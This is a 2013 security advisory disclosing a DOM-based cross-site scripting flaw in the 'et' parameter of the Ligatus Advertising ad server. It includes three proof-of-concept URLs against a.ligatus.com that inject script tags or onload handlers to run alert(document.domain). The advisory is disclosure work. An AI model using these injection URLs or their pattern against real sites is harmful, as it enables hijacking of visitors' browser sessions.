Advisory:		Ligatus Advertising - DOM Based Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2013-007
Author:			Stefan Schurtz
Affected Software:	Successfully tested on a.ligatus.com
Vendor URL:		http://www.ligatus.com/
Vendor Status:		informed

==========================
Vulnerability Description
==========================

The 'et'-Parameter in Ligatus Advertising is prone to a DOM Based XSS vulnerability.

==========================
PoC-Exploit
==========================

// Internet Explorer 10

http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />

// Aurora 8.0 

http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><script>alert(document.domain)</script>

// FF 20.0.1

http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />

==========================
Disclosure Timeline
==========================

11-May-2013 - vendor informed by email

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.ligatus.de/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-007.txt